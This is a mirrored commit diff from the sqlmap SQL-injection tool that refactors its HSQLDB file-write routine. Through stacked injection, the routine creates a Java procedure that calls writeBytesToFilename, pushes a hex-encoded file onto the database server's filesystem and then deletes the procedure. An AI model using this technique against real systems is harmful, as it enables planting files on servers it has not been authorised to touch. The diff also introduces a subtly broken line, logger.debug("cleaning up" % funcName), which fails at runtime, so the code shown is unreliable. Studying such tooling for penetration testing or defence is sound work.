mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
Trivial refactoring for #4379
This commit is contained in:
parent
babe52eb10
commit
0585a55ee0
|
@ -18,7 +18,7 @@ from lib.core.enums import OS
|
||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.4.10.4"
|
VERSION = "1.4.10.5"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
|
@ -21,26 +21,23 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
@stackedmethod
|
@stackedmethod
|
||||||
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
|
|
||||||
funcName = randomStr()
|
funcName = randomStr()
|
||||||
MAX_BYTES = 2 ** 20
|
max_bytes = 1024 * 1024
|
||||||
|
|
||||||
debugMsg = "creating a Java Language Procedure '%s'" % funcName
|
debugMsg = "creating JLP procedure '%s'" % funcName
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
|
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)
|
||||||
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
||||||
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
||||||
inject.goStacked(addFuncQuery)
|
inject.goStacked(addFuncQuery)
|
||||||
|
|
||||||
logger.debug("encoding file to its hexadecimal string value")
|
|
||||||
|
|
||||||
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
||||||
fcEncodedStr = fcEncodedList[0][2:]
|
fcEncodedStr = fcEncodedList[0][2:]
|
||||||
fcEncodedStrLen = len(fcEncodedStr)
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
||||||
warnMsg = "the injection is on a GET parameter and the file "
|
warnMsg = "as the injection is on a GET parameter and the file "
|
||||||
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||||||
warnMsg += "bytes, this might cause errors in the file "
|
warnMsg += "bytes, this might cause errors in the file "
|
||||||
warnMsg += "writing process"
|
warnMsg += "writing process"
|
||||||
|
@ -49,15 +46,14 @@ class Filesystem(GenericFilesystem):
|
||||||
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
# http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
# Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
||||||
invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
|
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)
|
||||||
inject.goStacked(invokeQuery)
|
inject.goStacked(invokeQuery)
|
||||||
|
|
||||||
logger.debug("removing procedure %s from DB" % funcName)
|
logger.debug("cleaning up" % funcName)
|
||||||
delQuery = "DELETE PROCEDURE " + funcName
|
delQuery = "DELETE PROCEDURE %s" % funcName
|
||||||
inject.goStacked(delQuery)
|
inject.goStacked(delQuery)
|
||||||
|
|
||||||
message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
|
message = "the local file '%s' has been written on the back-end DBMS" % localFile
|
||||||
message += "file system ('%s')" % remoteFile
|
message += "file system ('%s')" % remoteFile
|
||||||
logger.info(message)
|
logger.info(message)
|
||||||
|
|
||||||
|
|
|
@ -96,7 +96,7 @@ class Filesystem(GenericFilesystem):
|
||||||
fcEncodedStrLen = len(fcEncodedStr)
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
||||||
warnMsg = "the injection is on a GET parameter and the file "
|
warnMsg = "as the injection is on a GET parameter and the file "
|
||||||
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||||||
warnMsg += "bytes, this might cause errors in the file "
|
warnMsg += "bytes, this might cause errors in the file "
|
||||||
warnMsg += "writing process"
|
warnMsg += "writing process"
|
||||||
|
|
Loading…
Reference in New Issue
Block a user